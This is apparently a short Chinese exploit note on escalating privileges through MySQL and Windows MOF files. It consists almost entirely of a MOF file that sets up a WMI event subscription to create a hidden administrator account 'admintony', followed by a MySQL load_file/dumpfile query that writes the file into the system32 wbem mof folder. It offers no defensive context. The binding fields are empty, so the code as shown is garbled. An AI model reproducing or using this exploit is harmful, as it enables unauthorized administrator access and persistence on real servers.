002-MOF手工提权辅助.md
872 B / 2021-07-17 00:01:42
# MOF提权:
```bash
#pragma namespace("\\.\root\subscription")
instance of __EventFilter as
{
EventNamespace = "Root\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\") WSH.run(\"net.exe user admintony admin /add&&net.exe localgroup administrators admintony /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = ;
Filter = ;
};
```
保存为 1.mof
然后mysql执行
```sql
select load_file('D:/wwwroot/1.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
```